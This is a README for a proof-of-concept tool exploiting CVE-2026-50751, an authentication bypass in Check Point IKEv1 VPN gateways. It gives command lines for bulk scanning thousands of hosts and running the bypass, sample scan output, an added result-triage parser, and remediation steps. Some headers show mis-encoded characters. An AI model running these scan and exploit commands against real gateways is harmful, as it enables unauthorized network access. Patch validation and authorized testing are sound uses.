Source: https://sploitus.com/exploit?id=6F97F4B7-80CC-50A6-87D2-6C3340B5EB76

# CVE-2026-50751 - Check Point IKEv1 Authentication Bypass

> **Standalone proof-of-concept** for CVE-2026-50751, a critical Check Point IKEv1 authentication bypass allowing unauthenticated VPN access without valid credentials.

---

## โš ๏ธ Legal Notice

**For authorized security testing only.**

Use this tool exclusively on systems you own or have **explicit written permission** to test. Unauthorized access is illegal. The authors accept no liability for misuse.

---

## 🔥 What This Tool Does

| Mode | Command | Purpose |
|------|---------|---------|
| **Bulk Scan** | `--scan -l targets.txt` | Probe thousands of IPs for IKEv1 exposure |
| **Deep Scan** | `--scan -l targets.txt` | Detect likely vulnerable gateways |
| **Fast Scan** | `--scan --shallow -l ips.txt` | Rapid IKEv1 presence check |
| **Exploit** | `--exploit -t IP` | Full authentication bypass PoC |

**No `pip install` required**: all cryptography is bundled in the local `cryptography/` folder.

---

## 🎯 Affected Products & Versions

> **All Check Point deployments with IKEv1 Remote Access enabled are potentially affected** until patched.

| Product Line | Affected Versions |
|--------------|-------------------|
| **Quantum Security Gateways** | R80.40 → R82.10 |
| **R80.x Gateways** | R80.20, R80.30, R80.40 and all maintenance releases |
| **R81.x Gateways** | R81.00, R81.10, R81.20 and all maintenance releases |
| **R82.x Gateways** | R82.00, R82.10 and all maintenance releases |
| **Spark Gateways** | R80.20.X, R81.10.X, R82.00.X |
| **Mobile Access / Remote Access VPN** | All versions with IKEv1 enabled |
| **CloudGuard Network** | All cloud gateway versions running affected code |

### Exposure Requirements

- Remote Access VPN or Mobile Access is enabled
- IKEv1 is allowed for legacy VPN clients
- Gateway accepts pre-shared key / certificate-based IKEv1 handshakes
- Machine certificate is **not** enforced as mandatory

### Not Affected (when configured correctly)

- Gateways with IKEv1 fully disabled
- IKEv2-only Remote Access policies
- Mandatory machine certificate authentication enforced
- Patched gateways with SK185033 hotfix applied

---

## 📦 Installation

```bash
# No dependencies - ready to run
python CVE-2026-50751.py --help
```

---

## 🚀 Usage

### Single Target - Vulnerability Scan

```bash
python CVE-2026-50751.py --scan -t 192.168.1.1 -p 500
python CVE-2026-50751.py --scan -t vpn.example.com --ports 500,4500 -v
```

### Single Target - Full Exploit (Authorized Only)

```bash
python CVE-2026-50751.py --exploit -t 192.168.1.1 -p 500
python CVE-2026-50751.py --exploit -t vpn.example.com --interface 10.0.0.5 -v
```

### Bulk Scan - Large IP Lists

Create a target file (`targets.txt`):

```text
# One target per line - comments and blank lines are ignored
192.168.1.1
10.0.0.50:500
vpn.corp.example.com:4500
203.0.113.10
```

Run concurrent scan across the list:

```bash
# Deep vulnerability scan (recommended)
python CVE-2026-50751.py --scan -l targets.txt --threads 64 -o results.txt

# Fast IKEv1 detection on huge lists
python CVE-2026-50751.py --scan --shallow -l targets.txt --threads 128 --ports 500,4500 -o ike_open.txt

# Verbose per-host output
python CVE-2026-50751.py --scan -l targets.txt -v --threads 32
```

### Scan Output Example

```text
[VULNERABLE] 203.0.113.10:500 - IKEv1 accepts crafted KE/NONCE - likely vulnerable
[IKE OPEN] 198.51.100.5:4500 - IKEv1 active (SPI a1b2c3d4e5f67890)
[PATCHED] 192.0.2.1:500 - IKEv1 active, crafted KE/NONCE rejected
[CLOSED] 192.0.2.99:500 - No IKE response

============================================================
SCAN SUMMARY
  VULNERABLE : 3
  IKE OPEN   : 12
  PATCHED    : 5
  CLOSED     : 980
  ERROR      : 0
============================================================
```

Results file format (`results.txt`):

```text
vulnerable	203.0.113.10	500	IKEv1 accepts crafted KE/NONCE - likely vulnerable
ike_open	198.51.100.5	4500	IKEv1 active (SPI a1b2c3d4e5f67890)
```
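For triage after a large scan, the tab-separated results file is easier to work with than the console output. The following parser is an added example (not part of the tool or its repository) that reads that file format, tolerates comment and malformed lines, counts hosts per status, and emits a patch queue ordered so that hosts reported `vulnerable` come first and hosts still answering IKEv1 (`ike_open`) follow, since the remediation section recommends moving those to IKEv2-only anyway. The sample input is constructed to match the format shown above; the `ScanResult` type, `parse_results`, `summarize` and `patch_queue` names are this example's own.

```python
"""Parse the scanner's results file (status<TAB>host<TAB>port<TAB>detail) and
build a remediation priority list. Added example; not the tool's own code."""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample in the results.txt format documented above (not real scan data).
# Includes a comment line and a malformed line to show they are skipped, not fatal.
SAMPLE_RESULTS = """\
vulnerable\t203.0.113.10\t500\tIKEv1 accepts crafted KE/NONCE - likely vulnerable
ike_open\t198.51.100.5\t4500\tIKEv1 active (SPI a1b2c3d4e5f67890)
patched\t192.0.2.1\t500\tIKEv1 active, crafted KE/NONCE rejected
# comment lines are ignored
closed\t192.0.2.99\t500\tNo IKE response
malformed line without tab separators
"""

# Lower number = more urgent. Statuses mirror the SCAN SUMMARY categories.
PRIORITY: Dict[str, int] = {
    "vulnerable": 0, "ike_open": 1, "patched": 2, "closed": 3, "error": 4,
}


@dataclass(frozen=True)
class ScanResult:
    status: str   # one of the PRIORITY keys, lower-cased
    host: str     # IP or hostname as written in the file
    port: int     # UDP port that answered (500 or 4500 in practice)
    detail: str   # free-text reason reported by the scanner


def parse_results(text: str) -> List[ScanResult]:
    """Turn the raw file contents into ScanResult records.

    Blank lines, '#' comments and lines that do not have exactly four
    tab-separated fields (or a non-numeric port) are skipped so one bad
    line in a large file does not abort the whole triage run.
    """
    results: List[ScanResult] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t", 3)  # detail may itself contain spaces, never tabs
        if len(parts) != 4:
            continue
        status, host, port, detail = parts
        try:
            port_num = int(port)
        except ValueError:
            continue
        results.append(ScanResult(status.lower(), host, port_num, detail))
    return results


def summarize(results: List[ScanResult]) -> Dict[str, int]:
    """Count of hosts per status, equivalent to the console SCAN SUMMARY block."""
    return dict(Counter(r.status for r in results))


def patch_queue(results: List[ScanResult]) -> List[str]:
    """Return 'host:port' strings that still need action, most urgent first.

    'vulnerable' hosts need the hotfix now; 'ike_open' hosts answered IKEv1
    but were not flagged, and should still be moved to IKEv2-only or have
    the crafted-exchange check re-run after patching.
    """
    actionable = [r for r in results if r.status in ("vulnerable", "ike_open")]
    actionable.sort(key=lambda r: (PRIORITY[r.status], r.host, r.port))
    return [f"{r.host}:{r.port}" for r in actionable]


if __name__ == "__main__":
    parsed = parse_results(SAMPLE_RESULTS)
    print("summary:", summarize(parsed))
    for entry in patch_queue(parsed):
        print("needs action:", entry)
```

Point `parse_results` at the contents of the `-o` results file to use it on a real run; the output ordering is deterministic (status priority, then host, then port), so successive scans can be diffed to confirm that hosts drop out of the queue once the hotfix is applied.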

---

## ๐Ÿ› ๏ธ CLI Reference

| Option | Description |
|--------|-------------|
| `-t, --target` | Single IP or hostname |
| `-l, --list` | Target list file (bulk mode) |
| `-p, --port` | Default port (500) |
| `--ports` | Multiple ports: `500,4500` |
| `--scan` | Detection / vulnerability scan |
| `--exploit` | Full authentication bypass PoC |
| `--shallow` | Fast scan: IKE response only |
| `--threads N` | Concurrent workers (default: 32) |
| `--timeout N` | UDP timeout seconds (default: 5) |
| `-o, --output` | Save results to file |
| `-v, --verbose` | Detailed output |
| `--interface` | Bind to specific source IP |

---

## 🧬 Technical Summary

| Field | Value |
|-------|-------|
| **CVE** | CVE-2026-50751 |
| **Type** | Authentication Bypass (CWE-287) |
| **CVSS** | 9.3 Critical |
| **Vector** | `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N` |
| **Protocol** | IKEv1 (deprecated) |
| **Root Cause** | Certificate validation logic flaw in Remote Access key exchange |
| **Impact** | Unauthenticated VPN session establishment |
| **CISA KEV** | Added 2026-06-08; patch by 2026-06-11 |

---

## ๐Ÿ›ก๏ธ Remediation

### 1. Apply Check Point Hotfix (Recommended)

| Version | Hotfix Take |
|---------|-------------|
| R82.10 | Take 19+ |
| R82 | Take 103+ |
| R81.20 | Take 141+ |

Reference: [SK185033](https://support.checkpoint.com/results/sk/sk185033)

### 2. Immediate Mitigations

- Disable legacy VPN clients (IKEv1)
- Enforce **IKEv2 only** in Remote Access settings
- Require **mandatory machine certificate** authentication
- Block UDP/500 and UDP/4500 from untrusted networks where VPN is not needed

---

## 📚 References

- [NVD: CVE-2026-50751](https://nvd.nist.gov/vuln/detail/CVE-2026-50751)
- [Check Point SK185033](https://support.checkpoint.com/results/sk/sk185033)
- [CISA Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)

---

## โš–๏ธ Disclaimer

This software is provided **as-is** without warranty. Intended solely for defensive security research, authorized penetration testing, and patch validation.